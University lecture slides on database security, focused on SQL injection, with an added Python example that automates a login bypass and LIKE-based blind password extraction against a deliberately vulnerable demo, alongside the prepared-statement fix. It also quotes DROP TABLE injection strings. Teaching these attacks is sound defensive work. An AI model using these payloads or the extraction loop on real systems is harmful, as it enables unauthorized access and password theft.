  1. DATABASE SECURITY
     CS4750 – Database Systems
     Prof. Nada Basit, Email: basit@virginia.edu
     Fall 2020, University of Virginia

  2. Levels of DB Security
     There are 6 levels that impact database security:
     - Database Level – database users and authorization
     - Application Level – information management and processing
     - Operating System Level – data storage and protection
     - Network Level – data transmission
     - Physical Level – computer equipment protection
     - Human Level – social engineering protection
     Security matters not only at the database level but across the entire database application: a breach can happen at any of these levels.

  3. Application Level

  4. Application Level
     - Write programs with security in mind from the beginning!
     - Guard against SQL injection attacks: use prepared statements, so that user input travels to the database as parameters and is never spliced into the query text
     - Use strong typing to prevent type errors: expect back a particular type and nothing else
     - Catch and handle all errors! (A raw database error shown to the user leaks the query's structure, which an attacker can use to refine an injection)
     - Encrypt data when possible, and don't move it over open channels through the application!
     - Programmers/developers should access code securely, e.g. over SSH

  5. SQL INJECTION ATTACK VIDEOS

  6. SQL Injection Attack
     - Given a SQL query where some portion is left blank for the user to fill in, the attacker fills the blank with a string that:
       - matches the format the query expects, and
       - also contains extra SQL commands to get data they should not be allowed to see

  7. Classic SQL Injection
     - Consider the following SQL query:
       SELECT * FROM Users WHERE Username='$username' AND Password='$password'
     - Such a query is typically used by a web application to authenticate a user
     - If the query returns a row, a user with that set of credentials exists in the database and the user is allowed to log in to the system; otherwise access is denied
     - The values of the input fields are generally obtained from the user through a web form / login screen
     https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

  8. Classic SQL Injection
     - Let's use the same SQL query:
       SELECT * FROM Users WHERE Username='$username' AND Password='$password'
     - What happens if we insert the following Username and Password values?
       $username = 1' or '1'='1
       $password = 1' or '1'='1
     - The query becomes:
       SELECT * FROM Users WHERE Username='1' OR '1'='1' AND Password='1' OR '1'='1'
     - The query returns a row (or a set of rows) because the condition is always true: AND binds tighter than OR, so the trailing OR '1'='1' makes the whole WHERE clause true for every row. Note that the injected values end with an unclosed '1 because the application's own template supplies the closing quote. In this way the system has authenticated the user without knowing a valid username and password!

  9. SQL Injection Attacks
     - Using this attack strategy, if the application is not using a prepared statement (for instance), it means...
     - You can type in whatever you want, including SQL – this is how SQL injection attacks happen
     - E.g. for the username type in anything, and for the password type in ' or 1=1
     - The ' closes the quote (an empty string). How often is 1=1? Always true! (The quote the application adds after your input still has to be dealt with: end the payload with another unclosed literal such as ' or '1'='1, or comment out the rest of the line)
     - You can then get creative afterwards using nested SQL queries

  10. Simple attack: guessing the password (brute force... but if you've got the time!)
      SELECT username FROM UsersTbl WHERE username='' AND password=''
      - The idea is to execute a SQL injection that tells you something about the actual password
      - If you construct a statement that is TRUE, the system logs you in
      - So ask questions that have a TRUE or FALSE answer, and slowly build up the information you need (hint: use LIKE)
      - Use LIKE to compare a guess with the actual password. Using the pattern-matching symbol %, we build a query that tacks a password comparison onto the username field:
        ...WHERE username='admin' AND password LIKE 'a%' #' AND password='...'
      - Type the injected text (admin' AND password LIKE 'a%' #) into the username field; whatever is in the password field is commented out and ignored. (# starts a comment in MySQL; other databases use -- )

  11. Simple attack: guessing the password (brute force... but if you've got the time!)
      - Assume we know the username is admin. When we submit this, the query checks whether the username is admin and whether the additional LIKE comparison is true
      - The query ends there: the original password check NEVER executes because it is commented out
      - After injecting this, if we see "Incorrect username or password" the guess was false, so we keep trying different characters until we successfully log in. If we are logged in, we know the question was true!
      - Remember, % matches 0 or more characters; to match exactly one character, use _. For example, '_c%' checks whether the 2nd character is a "c"
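The classic ' OR '1'='1 bypass of slides 7-9 and the LIKE-based password guessing of slides 10-11, as one added worked example in Python. This is editor-supplied code, not part of the slides or of the course's activity tool. It assumes SQLite (the standard-library sqlite3 module) in place of the MySQL the slides imply, so the comment marker is -- rather than #; the UsersTbl table, its two rows, the plaintext passwords and all function names are constructed for the example. The last function goes beyond slide 10's one-character-at-a-time manual guessing and runs the full prefix-extension loop that recovers the whole password.

```python
"""Added example (not from the slides): a login built by string
concatenation, the classic ' OR '1'='1 bypass, the LIKE-based boolean
oracle that recovers a password one character at a time, and the
prepared-statement version that defeats all of it.

Assumptions: SQLite (stdlib sqlite3) stands in for MySQL, so the comment
marker is '-- ' rather than '#'; the UsersTbl schema and its two rows are
constructed for this example; passwords are stored in plaintext only
because the slides' query compares them that way.
"""
import sqlite3
import string


def make_db():
    """Constructed sample data: an in-memory UsersTbl with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UsersTbl (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO UsersTbl VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "wonderland")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: the slide's query built by concatenation.
    Whatever the user types becomes part of the SQL text."""
    sql = ("SELECT username FROM UsersTbl WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_prepared(conn, username, password):
    """Hardened: a prepared statement. The driver sends the two values
    separately from the query text, so quotes inside them are just data."""
    sql = "SELECT username FROM UsersTbl WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def char_at_is(conn, username, position, ch):
    """Slide 11's single-character question: LIKE '_c%' asks whether the
    2nd character is 'c'. '_' matches exactly one character, '%' the rest.
    The injected username closes the literal, adds the LIKE test and
    comments out the application's own password check."""
    pattern = "_" * (position - 1) + ch + "%"
    probe = username + "' AND password LIKE '" + pattern + "' -- "
    return login_vulnerable(conn, probe, "ignored")


def guess_password(conn, username,
                   alphabet=string.ascii_lowercase + string.digits,
                   max_len=32):
    """Slide 10's brute force done systematically: extend a known prefix one
    character at a time ("does the password start with <prefix><ch>?")
    until an exact-match probe confirms the whole password.

    Caveat: LIKE is case-insensitive for ASCII in SQLite and in MySQL's
    default collation, so a mixed-case password would need extra case
    checks; the alphabet here covers lowercase letters and digits only."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            prefix_probe = (username + "' AND password LIKE '"
                            + known + ch + "%' -- ")
            if login_vulnerable(conn, prefix_probe, "ignored"):
                known += ch
                break
        else:
            return known  # no character extends the prefix; give up
        exact_probe = username + "' AND password='" + known + "' -- "
        if login_vulnerable(conn, exact_probe, "ignored"):
            return known  # the oracle confirmed the full password
    return known


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print("vulnerable login, classic bypass:", login_vulnerable(db, payload, payload))
    print("prepared login, same input:      ", login_prepared(db, payload, payload))
    print("2nd char of admin password is 3? ", char_at_is(db, "admin", 2, "3"))
    print("recovered admin password:        ", guess_password(db, "admin"))
```

Each probe costs one login attempt, so the loop makes at most len(alphabet) requests per character, which is why the slides call this brute force "if you've got the time"; a real application should rate-limit and lock out, but the only fix that removes the oracle is the prepared statement, which makes every probe above return False.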

  12. SQL Injection Attack Tool: Get Password Activity
      http://databases.cs.virginia.edu/sqlinject/activity/activity.php
      Tool developed by Dr. Nada Basit, Joseph Chen, Alexander Sun, Rohan Koduri, and Vamshi Garikapati

  13. SQL Injection Attack Examples
      - SQL injection is not new and has been used frequently to attack websites and companies
      - For a list of examples, see: https://en.wikipedia.org/wiki/SQL_injection#Examples

  14. In Popular Culture
      https://en.wikipedia.org/wiki/SQL_injection#In_popular_culture
      - Unauthorized login to web sites by means of SQL injection forms the basis of one of the subplots in J.K. Rowling's novel The Casual Vacancy, published in 2012.
      - An xkcd cartoon involved a character named Robert'); DROP TABLE students;-- to carry out a SQL injection. As a result of this cartoon, SQL injection is sometimes informally referred to as 'Bobby Tables'.
      - In 2014, an individual in Poland legally renamed his business to Dariusz Jakubowski x'; DROP TABLE users; SELECT '1 in an attempt to disrupt the operation of spammers' harvesting bots.
      - Companies House, the UK's official register of companies, has a company named ; DROP TABLE "COMPANIES";-- LTD
      - The 2015 game Hacknet has a hacking program called SQL_MemCorrupt. It is described as injecting a table entry that causes a corruption error in a SQL database, then querying said table, causing a SQL database crash and core dump.

  15. http://www.xkcd.com/327/ ; https://beta.companieshouse.gov.uk/company/10542519

  16. SQL INJECTION USEFUL SITE REVIEW (FYI)

  17. Question:
      - Which DB level is the cause of the most DB break-ins?
        - Database Level
        - Application Level
        - Operating System Level
        - Network Level
        - Physical Level
        - Human Level
      - Did you have the chance to think about it?

  18. Human Level
      - What % of all DB break-ins do you think occur at level 6?
      - More than 90% happen at the Human level!
      - An estimated 70% of unauthorized access to information is committed by internal employees, who are also responsible for more than 95% of intrusions that result in significant financial losses!!
